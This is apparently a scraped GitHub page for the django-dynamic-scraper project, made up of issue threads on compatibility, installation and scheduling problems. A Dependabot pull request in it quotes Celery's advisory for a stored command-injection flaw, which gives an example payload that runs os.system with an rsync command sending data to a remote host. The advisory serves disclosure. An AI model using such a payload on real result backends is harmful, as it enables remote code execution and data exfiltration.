Creating Scrapy scrapers via the Django admin interface

Overview

django-dynamic-scraper

Django Dynamic Scraper (DDS) is an app for Django which builds on top of the scraping framework Scrapy and lets you create and manage Scrapy spiders via the Django admin interface. It was originally developed for german webtv program site http://fernsehsuche.de.

Documentation

Read more about DDS in the ReadTheDocs documentation:

Getting Help/Updates

There is a mailing list on Google Groups, feel free to ask questions or make suggestions:

Infos about new releases and updates on Twitter:

Comments
  • Allow the user to customize the scraper

    Allow the user to customize the scraper

    I am a newbie to web crawler. Now I am gong to build a django web app, in a part of which users fill up a form(keywords and time,etc.) and submit it. Then the scraper will begin to work and craw the data according to the user's requirement at a specific website(set by me). After that the data will pass to another model to do some clustering work. How can I do that?

    opened by ghost 11
  • Added FOLLOW pagination type.

    Added FOLLOW pagination type.

    This only follows pages (dynamically) after crawling all of the links in the base page. If you have any interest in this PR, I can flesh out the implementation and docs.

    someday 
    opened by scott-coates 10
  • Add explicit on_delete argument to be compatible for Django 2.0.

    Add explicit on_delete argument to be compatible for Django 2.0.

    Django 2 requires explicit on_delete argument as per the following page.

    https://docs.djangoproject.com/en/2.0/releases/2.0/

    "The on_delete argument for ForeignKey and OneToOneField is now required in models and migrations. Consider squashing migrations so that you have fewer of them to update."

    This fix will suppress the Django 2.0 warnings in Django 1.x and fix the compatibility issue for Django 2.

    opened by ryokamiya 9
  • can't run python manage.py celeryd

    can't run python manage.py celeryd

    Trying running $python manage.py celeryd -l info -B --settings=example_project.settings gives me this error: File "manage.py", line 10, in TypeError: invalid arguments

    My system info as below: Python 2.7 Celery 3.1.19 Django-celery 3.1.16 Django-celery is installed and can be seen in example_project django admin page except I got issue when running the example command. Any advise would be appreciated. Thanks.

    opened by ratha-pkh 8
  • New Django1.7 branch

    New Django1.7 branch

    Here is a small contribution to adapt the package to Django 1.7 and Scrapy 0.24. It has not been heavily tested yet, and probably needs additional feedback from the community, but it's a small contribution for those who wants to work in a more up-to-date environment.

    ps : note that this is my first PR and it might not be fitting to the general rules.

    opened by jice-lavocat 7
  • Installation Failure in Pillow req when Brew's JPEG package isn't installed

    Installation Failure in Pillow req when Brew's JPEG package isn't installed

    The Pillow requirement attempted to be installed by DDS has a dependancy with brew jpeg and throws the following error when installed either direct from GitHub or via Pip on OSX 10.13.4 and Python version 3.6.4.

    ValueError: jpeg is required unless explicitly disabled using --disable-jpeg, aborting

    Pillow's OSX's installation instructions detail how to add these dependancies. brew install libtiff libjpeg webp little-cms2

    opened by tom-price 5
  • Allow storing extra XPATHs / add another pagination option

    Allow storing extra XPATHs / add another pagination option

    Currently only 5 XPATH types are stored — STANDARD, STANDARD_UPDATE, DETAIL, BASE and IMAGE. It would be good to have another section called EXTRA.

    It is quite often that I need to access an XPATH value that might not be necessarily mapped to a model field. I my case, I need an additional XPATH for finding the next pagination link and have had to resort to using on of the other fields as a hack.

    opened by mridang 5
  • Question: IN/ACTIVE status on NewsWebsite?

    Question: IN/ACTIVE status on NewsWebsite?

    Hello,

    Quick newbie question, I have a use case where I have 3 NewsWebsite entries where all scrape the same domain url with only the keyword differentiating each other like the following

    NewsWebsite 1 url is "http://www.somewebsite.com/?q=keyword1 NewsWebsite 2 url is "http://www.somewebsite.com/?q=keyword2 etc

    this way I can filter by a keyword on the Article admin as well as only needing to create 1 scraper for all. However I notice the IN/ACTIVE status is on the scraper, thus setting the scraper INACTIVE will stop scraping for all NewsWebsite when I actually only need to disable one keyword scraping. So is there a way to accomplish this in DDS?

    Cheers

    opened by senoadiw 4
  • pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    HI,

    I'm stuck in this problem, i configured a similar example to the startup project providing a detail page with 'pre_url': 'http://www.website.com'. I want it to scrape the listing every hour (using crontab) and add any new articles.

    When i run the command for the first time (Article table empty), it populates the items correctly, however if i run the command again when new article added (with scrapy crawl article_spider -a id=2 -a do_action=yes) with populated article it does scrap the page but doesn't add the new articles -

    2016-08-27 10:33:45 [scrapy] ERROR: Error downloading <GET doublehttp://www.website.com/politique/318534.html>
    Traceback (most recent call last):
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 1126, in _inlineCallbacks
        result = result.throwExceptionIntoGenerator(g)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/python/failure.py", line 389, in throwExceptionIntoGenerator
        return g.throw(self.type, self.value, self.tb)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/middleware.py", line 43, in process_request
        defer.returnValue((yield download_func(request=request,spider=spider)))
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/utils/defer.py", line 45, in mustbe_deferred
        result = f(*args, **kw)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/handlers/__init__.py", line 64, in download_request
        (scheme, self._notconfigured[scheme]))
    NotSupported: Unsupported URL scheme 'doublehttp': no handler available for that scheme
    2016-08-27 10:33:45 [scrapy] INFO: Closing spider (finished)
    

    i searched for this "doublehttp" scheme error but couldn't find anything useful.

    Versions i have -

    Twisted==16.3.2 Scrapy==1.1.2 scrapy-djangoitem==1.1.1 django-dynamic-scraper==0.11.2

    URL in DB (for an article) -

    http://www.website.com/politique/318756.html

    scraped URL without pre_url -

    /politique/318756.html

    Any hint ?

    Thank you for your consideration and for this great project.

    opened by Akramz 4
  • loaddata of example got errors

    loaddata of example got errors

    I config the example. when I run python manage.py loaddata open_news/open_news.json I got the errors below:

    $ python manage.py loaddata open_news/open_news.json Problem installing fixture 'open_news/open_news.json': Traceback (most recent call last): File "/usr/lib64/python2.7/site-packages/django/core/management/commands/loaddata.py", line 196, in handle obj.save(using=using) File "/usr/lib64/python2.7/site-packages/django/core/serializers/base.py", line 165, in save models.Model.save_base(self.object, using=using, raw=True) File "/usr/lib64/python2.7/site-packages/django/db/models/base.py", line 551, in save_base result = manager._insert([self], fields=fields, return_id=update_pk, using=using, raw=raw) File "/usr/lib64/python2.7/site-packages/django/db/models/manager.py", line 203, in _insert return insert_query(self.model, objs, fields, **kwargs) File "/usr/lib64/python2.7/site-packages/django/db/models/query.py", line 1576, in insert_query return query.get_compiler(using=using).execute_sql(return_id) File "/usr/lib64/python2.7/site-packages/django/db/models/sql/compiler.py", line 910, in execute_sql cursor.execute(sql, params) File "/usr/lib64/python2.7/site-packages/django/db/backends/util.py", line 40, in execute return self.cursor.execute(sql, params) File "/usr/lib64/python2.7/site-packages/django/db/backends/sqlite3/base.py", line 337, in execute return Database.Cursor.execute(self, query, params) IntegrityError: Could not load contenttypes.ContentType(pk=25): columns app_label, model are not unique

    What's wrong with it ?

    opened by gorf 4
  • DDS unusable with django >= 1.10

    DDS unusable with django >= 1.10

    Django 1.11.1 : We unable to add request page type 2017-05-14 16 34 55

    Django 1.9.7 : We have ability to add request page type 2017-05-14 16 36 26

    Looks like problem with registration of inline form for request page type

    DDS version in both cases - 0.12

    opened by tigrus 3
  • Bump celery from 3.1.25 to 5.2.2

    Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • New Scrapy Support List

    New Scrapy Support List

    I will use this thread to inform u for my tests with new Scrapy releases that DDS dont support atm. Keep in mind that i use a modified version of DDS 0.13.3 but i think if they work for me, they ll work with original DDS 0.13.3 too.

    Scrapy 1.6.0 works fine, Scrapy 1.8.0 works fine

    opened by bezkos 0
  • How can I save crawled data in multi model?

    How can I save crawled data in multi model?

    Hi, thanks for DDS I want to crawl items from a website and keep history of some fields (like price) I made a separate model and connect it to main model and in pipeline handle insert price in the price model (when crawl item is saving in db) and Its ok How can I add new price to price model when price changed?

    opened by relaxdevvv 0
  • Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    I started using the django dynamic scraper for my personal project.

    I created my scrapers as I should and everything works when I run scrapy crawl in a terminal Now I want to use django celery to schedule scraping. I followed everything in the tutorial (created a periodic task, ran celeryd, ran scrapyd, deployed the scrapy project, changed the scraper status to ACTIVE in the UI)

    The very first time it runs, I can see that a process is spawned in the scrapyd server. It runs once, and never run again. Even when I define a new periodic task.

    Celery keeps sending tasks, but all I see in the scrapyd is the following log: 2020-11-19T12:18:36+0200 [twisted.python.log#info] "127.0.0.1" - - [19/Nov/2020:10:18:36 +0000] "GET /listjobs.json?project=default HTTP/1.1" 200 93 "-" "Python-urllib/2.7"

    I tried to deactivate dynamic scheduling as explained in the documentation but it still does not work. My tasks are spawned only once and I can't work that way.

    If someone has already ran into this issue, I would highly appreciate the help.

    opened by benjaminelkrieff 0
  • Dynamically change the url of the

    Dynamically change the url of the "Website" component

    Hi everyone.

    I am working on a project in which I want multiple urls to be scrapped by the same scrapper. For example: Let's say I want to scrape social media profiles. I want to scrape the name and the profile picture. So I just define one scraper for this use case.

    Let's say I have the profile urls of 10000 people. How can I scrape all of these urls without defining 10000 websites in the Django Administrator ?

    Currently, what I see is that I can define one website with one hardcoded url and link it to a scraper and call the scrapy command tool with the website ID. But It doesn't give me any option to change the url dynamically.

    I can't believe that there is no such option and that's why I am asking the community if there is such an option or if I can define this specific mechanism at the model level.

    Thank you

    opened by benjaminelkrieff 0
Releases(v0.13.2)
🤖 Threaded Scraper to get discord servers from disboard.org written in python3

Disboard-Scraper Threaded Scraper to get discord servers from disboard.org written in python3. Setup. One thread / tag If you whant to look for multip

Ѵιcнч 11 Nov 01, 2022
Simple tool to scrape and download cross country ski timings and results from live.skidor.com

LiveSkidorDownload Simple tool to scrape and download cross country ski timings and results from live.skidor.com Usage: Put the python file in a dedic

0 Jan 07, 2022
Command line program to download documents from web portals.

command line document download made easy Highlights list available documents in json format or download them filter documents using string matching re

16 Dec 26, 2022
Examine.com supplement research scraper!

ExamineScraper Examine.com supplement research scraper! Why I want to be able to search pages for a specific term. For example, I want to be able to s

Tyler 15 Dec 06, 2022
Meme-videos - Scrapes memes and turn them into a video compilations

Meme Videos Scrapes memes from reddit using praw and request and then converts t

Partho 12 Oct 28, 2022
京东茅台抢购

截止 2021/2/1 日,该项目已无法使用! 京东:约满即止,仅限京东实名认证用户APP端抢购,2月1日10:00开始预约,2月1日12:00开始抢购(京东APP需升级至8.5.6版本及以上) 写在前面 本项目来自 huanghyw - jd_seckill,作者的项目地址我找不到了,找到了再贴上

abee 73 Dec 03, 2022
Web Scraping images using Selenium and Python

Web Scraping images using Selenium and Python A propos de ce document This is a markdown document about Web scraping images and videos using Selenium

Nafaa BOUGRAINE 3 Jul 01, 2022
A Pixiv web crawler module

Pixiv-spider A Pixiv spider module WARNING It's an unfinished work, browsing the code carefully before using it. Features 0004 - Readme.md updated, co

Uzuki 1 Nov 14, 2021
A Python package that scrapes Google News article data while remaining undetected by Google.

A Python package that scrapes Google News article data while remaining undetected by Google. Our scraper can scrape page data up until the last page and never trigger a CAPTCHA (download stats: https

Geminid Systems, Inc 6 Aug 10, 2022
联通手机营业厅自动做任务、签到、领流量、领积分等。

联通手机营业厅自动完成每日任务,领流量、签到获取积分等,月底流量不发愁。 功能 沃之树领流量、浇水(12M日流量) 每日签到(1积分+翻倍4积分+第七天1G流量日包) 天天抽奖,每天三次免费机会(随机奖励) 游戏中心每日打卡(连续打卡,积分递增至最高

2k May 06, 2021
Create crawler get some new products with maximum discount in banimode website

crawler-banimode create crawler and get some new products with maximum discount in banimode website. این پروژه کوچک جهت یادگیری و کار با ابزار سلنیوم

nourollah rezaei 2 Feb 17, 2022
Simple library for exploring/scraping the web or testing a website you’re developing

Robox is a simple library with a clean interface for exploring/scraping the web or testing a website you’re developing. Robox can fetch a page, click on links and buttons, and fill out and submit for

Dan Claudiu Pop 79 Nov 27, 2022
淘宝茅台抢购最新优化版本,淘宝茅台秒杀,优化了茅台抢购线程队列

淘宝茅台抢购最新优化版本,淘宝茅台秒杀,优化了茅台抢购线程队列

MaoTai 118 Dec 16, 2022
Ebay Webscraper for Getting Average Product Price

Ebay-Webscraper-for-Getting-Average-Product-Price The code in this repo is used to determine the average price of an item on Ebay given a valid search

17 Jan 05, 2023
A Web Scraper built with beautiful soup, that fetches udemy course information. Get udemy course information and convert it to json, csv or xml file

Udemy Scraper A Web Scraper built with beautiful soup, that fetches udemy course information. Installation Virtual Environment Firstly, it is recommen

Aditya Gupta 15 May 17, 2022
Shopee Scraper - A web scraper in python that extract sales, price, avaliable stock, location and more of a given seller in Brazil

Shopee Scraper A web scraper in python that extract sales, price, avaliable stock, location and more of a given seller in Brazil. The project was crea

Paulo DaRosa 5 Nov 29, 2022
Footballmapies - Football mapies for learning webscraping and use of gmplot module in python

Footballmapies - Football mapies for learning webscraping and use of gmplot module in python

1 Jan 28, 2022
Scrapy-soccer-games - Scraping information about soccer games from a few websites

scrapy-soccer-games Esse projeto tem por finalidade pegar informação de tabela d

Caio Alves 2 Jul 20, 2022
A tool to easily scrape youtube data using the Google API

YouTube data scraper To easily scrape any data from the youtube homepage, a youtube channel/user, search results, playlists, and a single video itself

7 Dec 03, 2022
TikTok Username Swapper/Claimer/etc

TikTok-Turbo TikTok Username Swapper/Claimer/etc I wanted to create it as fast as possible but i eventually gave up and recoded it many many many many

Kevin 12 Dec 19, 2022